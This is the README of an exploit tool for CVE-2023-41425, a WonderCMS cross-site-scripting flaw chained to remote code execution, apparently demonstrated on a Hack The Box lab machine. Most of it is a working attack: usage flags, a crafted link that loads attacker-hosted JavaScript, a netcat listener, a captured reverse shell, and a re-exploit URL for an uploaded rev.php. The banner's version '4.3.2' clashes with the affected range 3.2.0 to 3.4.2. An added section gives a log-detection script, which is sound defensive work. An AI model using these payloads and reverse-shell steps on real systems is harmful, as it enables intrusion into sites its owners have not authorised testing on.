# CVE-2023-41425
## Description
A Cross Site Scripting vulnerability in Wonder CMS Version 3.2.0 to Version 3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
This is a modified version of the original exploit by [prodigiousMind](https://github.com/prodigiousMind/) which extends the exploit to serve everything locally, with no reliance on an external internet connection.
It's useful if you're all at sea, and found a problem with your bike...
Note: xss.js is left in the repo for demonstration purposes; the script will overwrite it with your configuration when run.
## Usage
```
usage: exploit.py [-h] -u URL -lh LHOST -lp LPORT -sh SRVHOST -sp SRVPORT
WonderCMS 4.3.2 XSS to RCE Exploit
options:
-h, --help show this help message and exit
-u URL, --url URL The login URL of the WonderCMS site (e.g., http://localhost/wondercms/loginURL)
-lh LHOST, --lhost LHOST
The IP address for the reverse shell listener
-lp LPORT, --lport LPORT
The port for the reverse shell listener
-sh SRVHOST, --srvhost SRVHOST
The local IP serving the malicious XSS JavaScript
-sp SRVPORT, --srvport SRVPORT
The local port serving the malicious XSS JavaScript
```
## Example
Note: This exploit can be quite slow to work!
```
$python3 exploit.py -u http://sea.htb/loginURL -lh 10.10.14.101 -lp 7777 -sh 10.10.14.101 -sp 8888
##################################
# Wondercms 4.3.2 XSS to RCE #
# Original POC by prodigiousMind #
# Updated version by Ducksec #
##################################
Check you got this stuff right!
Parsed arguments:
URL: http://sea.htb/loginURL
LHOST: 10.10.14.101
LPORT: 7777
SRVHOST: 10.10.14.101
SRVPORT: 8888
[+] xss.js is created
[+] Execute the below command in another terminal:
----------------------------
nc -lvp 7777
----------------------------
Send the below link to admin:
----------------------------
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.101:8888/xss.js"></script><form+action="
----------------------------
[+] Ensure that main.zip is still in this directory.
[+] Once the target successfully requests main.zip it's safe to kill this script.
[+] Once complete, you can also re-exploit by requesting: http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.101&lport=7777
Starting HTTP server to allow access to xss.js
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.129.178.129 - - [02/Oct/2024 14:39:51] "GET /xss.js HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
```
```
$nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.14.101] from (UNKNOWN) [10.129.178.129] 39958
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
13:40:01 up 4 min, 0 users, load average: 0.93, 0.49, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
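On the target side, the requests visible in the run above (the crafted `page=` link and the later request to `/themes/revshell-main/rev.php` with `lhost` and `lport`) leave recognisable entries in the web server's access log. The following is an added detection example, not part of the original repository: it assumes common/combined log format, the sample lines are constructed, and the `installModule` query parameter name is an assumption based on the component named in the description.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
THEME_PHP = re.compile(r"^/themes/[^/]+/[^/]+\.php$", re.I)

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Oct/2024:14:39:40 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '198.51.100.9 - - [02/Oct/2024:14:39:50 +0000] "GET /index.php?page=loginURL?%22%3E%3C/form%3E'
    '%3Cscript+src=%22http://192.0.2.10:8888/xss.js%22%3E%3C/script%3E%3Cform+action=%22 HTTP/1.1" 200 5300',
    '198.51.100.9 - - [02/Oct/2024:14:39:52 +0000] "GET /?installModule=http://192.0.2.10:8888/main.zip HTTP/1.1" 302 0',
    '192.0.2.10 - - [02/Oct/2024:14:45:00 +0000] "GET /themes/revshell-main/rev.php?lhost=192.0.2.10&lport=7777 HTTP/1.1" 200 0',
]

def classify(target):
    """Return the names of the rules a single request target matches."""
    try:
        parts = urlsplit(target)
    except ValueError:  # malformed target; nothing to parse
        return []
    params = parse_qsl(parts.query, keep_blank_values=True)  # also URL-decodes
    keys = {k.lower() for k, _ in params}
    hits = []
    if any("<script" in v.lower() for _, v in params):
        hits.append("script-tag-in-query")
    if "installmodule" in keys:  # assumed parameter name; a rare admin action
        hits.append("module-install-request")
    if THEME_PHP.match(parts.path) and {"lhost", "lport"} <= keys:
        hits.append("theme-php-callback-params")
    return hits

def scan(lines):
    """Return (line_number, rule) pairs for every matching log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            findings.extend((number, rule) for rule in classify(match.group(1)))
    return findings

if __name__ == "__main__":
    for number, rule in scan(SAMPLE_LOG):
        print(f"line {number}: {rule}")
```

A `module-install-request` hit on its own can be a legitimate administrator action; it becomes significant when it follows a `script-tag-in-query` hit from the same client.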
## References
1. https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
2. https://github.com/WonderCMS/wondercms/releases/tag/3.4.3
## Disclaimer
This code is provided for educational and ethical security testing purposes only. It should be used responsibly and only in environments where explicit authorization has been granted. Unauthorized or malicious use is strictly prohibited. By using this code, you agree to adhere to all applicable laws, regulations, and ethical standards applicable in your jurisdiction. The creators and contributors disclaim any liability for any damages or consequences arising from the misuse or unauthorized use of this code.